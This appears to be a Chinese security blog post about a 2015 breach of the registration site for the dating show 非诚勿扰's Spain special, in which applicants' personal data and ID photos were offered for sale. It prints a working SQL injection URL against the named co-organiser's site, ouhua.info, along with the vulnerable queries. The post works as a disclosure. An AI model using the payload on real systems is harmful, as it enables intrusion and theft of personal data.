2015年江苏卫视非诚勿扰(国内的一款相亲节目)开启了西班牙专场的相亲报名活动,目前似乎已经开始了录制。

然而不幸的是,从报名一开始,其网上报名的站点就遭到了黑客的入侵,随后便有黑客在网上抛出出售非诚勿扰女嘉宾报名信息(含证件)照的帖子,对个人信息进行公然出售。

 

 

习科安全研究团队第一时间联系到了兜售信息的黑客(简称黑客N),通过长时间的交涉,黑客N向习科安全研究团队提供了数据样本,并答应暂时不放出其获得的数据及证件照等隐私信息。

有黑客在一个月以前就在习科论坛发布了黑客N成功获得非诚勿扰西班牙专场网上报名信息的入侵技术细节,因其涉及法律问题,帖子内容已被论坛版主屏蔽。

从官方披露的宣传信息可以看到,非诚勿扰西班牙专场的协办方为西班牙的欧华传媒(ouhua.info),然而最初始的安全问题也是出在协办方欧华传媒身上。

首先是欧华传媒主站本身存在一个SQL注入漏洞,测试语句如下:

http://www.ouhua.info/system/index.php?app=public&c
//得到[email protected]和5.5.27-rel28.1-log
http://www.ouhua.info/system/index.php?app=public&controller=Node.List&nodeId=1291)+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),0x3a,(select+distinct+table_schema+from+information_schema.tables+limit+1,1),0x3a)a+from+information_schema.tables+group+by+a)b+--+
##读取数据库列表


页面中存在两个SQL语句,都是用括号将GET变量nodeId引用的

select n.* ,pn.name as parent_name from xmcms_node n left join xmcms_node pn on n.parent_id = pn.id where n.id in ($_GET['nodeId']) order by n.id asc limit 0,1
select count(*) from xmcms_content_index ci left join xmcms_admin a on ci.admin_id = a.id left join xmcms_node n on ci.node_id = n.id where ci.node_id in ($_GET['nodeId'])


这样就导致黑客可以嵌入恶意语句获得服务器中的部分敏感信息。

 

 根据黑客披露的技术细节,显然这里只是问题的最初始点。由此注入点产生了一系列的安全问题,为避嫌我们在这里不便将技术细节继续披露。

 

 根据评估,习科从黑客N手上获取的报名信息包括证件照、生活照及120个字段(报名信息),涉及生活的方方面面,数据一旦传出去,造成的危害和影响会很恶劣。

 网络安全与各行各业及每个人都息息相关,媒体人在做媒体和宣传的同时,希望也加大保护隐私安全的力度,且媒且珍惜 :-)

 //silic.wiki